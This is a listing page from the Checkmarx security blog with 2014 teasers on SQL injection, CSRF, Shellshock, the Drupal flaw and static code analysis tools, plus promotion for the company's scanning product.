Checkmarx Blog


7 Essential Resource Centers to Boost Your InfoSec IQ

Dec 04, 2014 By Sharon Solomon | Many applications today possess critical vulnerabilities – SQL injections (SQLi), Cross Site Scripting (XSS) and Cross Site Request Forgery (CSRF) being just a few of them. The first step in combating these security issues is getting to know how they work and learning about them from real life scenarios. Unfortunately, not all developers today are familiar with the security aspects of software development.
Read More »

SQL Injection Tutorial: Tackling SQLi with Source Code Analysis

Nov 20, 2014 By Sharon Solomon | The impact of the Drupal fiasco is still being felt across all industry sectors. The world’s third biggest CMS platform was compromised with arguably the oldest hacking technique in existence – the SQL injection (SQLi). While the Drupal 7.32 update has resolved this specific problem, SQL injections won’t really go away until they are treated from the root – the application code.    
Read More »

The Ultimate List of Open Source Static Code Analysis Security Tools

Nov 13, 2014 By Sarah Vonnegut | Doing security the right way demands an army – of developers, security teams, and the tools that each uses to help create and maintain secure code.   With the increasingly important mindset of creating quality, secure code from the start, we’ve seen a greater shift towards the adoption of tools designed to detect flaws as quickly as possible in the software development lifecycle (SDLC).   One of those tools is static code analysis. The true strength of static source code analysis (SCA) is in quickly and automatically checking everything “under the hood” without actually executing the code. Because it works to discover issues that can be hard to discover manually, it’s a perfect companion to the human eye. Even the most senior security people still miss security flaws. After all – we are still human, so the combination of machine and man make for better coverage.
Read More »

Samsung’s ‘Find My Mobile’ CSRF Flaw: A Wake Up Call for Mobile Developers

Nov 06, 2014 By Sharon Solomon | Samsung is currently topping sales charts worldwide with a wide range of Android powered phones catering to virtually all market segments. This mass distribution of mobile devices has magnified the importance of creating secure mobile applications. Unfortunately, a CSRF loophole has been found in one of the the South Korean phone manufacturer’s proprietary applications.
Read More »

7 Lessons We Should Take Away from the Drupal SQL Injection Flaw

Nov 04, 2014 By Sarah Vonnegut | What’s the Deal with Drupal?
Another month, another apocalypse-summoning security catastrophe – and October was no different. Just over two weeks ago, the security team behind Drupal’s free and open-source CMS released an ominous security advisory that shocked many in the security industry. The advisory, SA-CORE-2014-005, informed users that an SQL injection flaw in all Drupal 7 sites allowed attackers access to databases and more.
Read More »

All You Need to Know About Shellshock & What You Can Do About It

Oct 02, 2014 By Sarah Vonnegut | So, what happens when a core component of Mac, Linux and other Unix-based operating systems is found to be highly vulnerable and easily exploitable? 
Last week, we found out: On September 24th, the world was first introduced to a family of bugs in the Bash shell, being referred to both as ‘Shellshock’ and ‘Bashdoor’.
Here’s a breakdown of what the Bash bug is, how it can be exploited, and how you can protect yourself.
Background on Bash & the Bash Bug Being Called Shellshock
Bash (short for Bourne Again Shell) is a command-line shell used to type and execute commands. It is prevalent in Mac OS X, Linux, and other versions of UNIX operating systems. It’s also a mainstay on servers running Apache, accounting for about 51% of the world’s servers.
Read More »

Major Android Browser Flaw Allowing Hackers to Bypass SOP Mechanism

Sep 30, 2014 By Sharon Solomon | The Android platform has taken the world by storm in recent years. It was announced at Google’s recent 2014 I/O developer conference that over 538 million Android devices are currently in use worldwide. Android has now leapfrogged Apple’s iOS in the US, where it currently has almost 52% of the smartphone market share.
Read More »

Risks and Rewards in Security: An Interview with Josh Sokol, InfoSec Program Owner and Creator of SimpleRisk

Sep 23, 2014 By Sarah Vonnegut | When you’re in the midst of a security issue, getting to the point of feeling on top of security again can seem a million miles away. Because in the end, security is about being aware of what’s going on in your environment and having a proactive approach to dealing with the threats. Being able to prioritize the severity of those threats and vulnerabilities that could impact the business is key to any security practitioner’s job. It’s in that vein that we recently spoke with Josh Sokol, an OWASP leader and the creator of SimpleRisk, an open source risk management tool he released to the community to help take some of the ‘obscurity’ out of security. With a background in computer science, a deep understanding of OWASP principles and as the owner of a security program at a large company, Sokol has a lot of great advice on how to do application security as well as security in general.
Read More »

Stay Connected

Sign up today & never miss an update from the Checkmarx blog

Get a Checkmarx Free Demo Now

Interested in trying CxSAST on your own code? You can now use Checkmarx's solution to scan uncompiled / unbuilt source code in 18 coding and scripting languages and identify the vulnerable lines of code. CxSAST will even find the best-fix locations for you and suggest the best remediation techniques. Sign up for your FREE trial now.

Checkmarx is now offering you the opportunity to see how CxSAST identifies application-layer vulnerabilities in real-time. Our in-house security experts will run the scan and demonstrate how the solution's queries can be tweaked as per your specific needs and requirements. Fill in your details and we'll schedule a FREE live demo with you.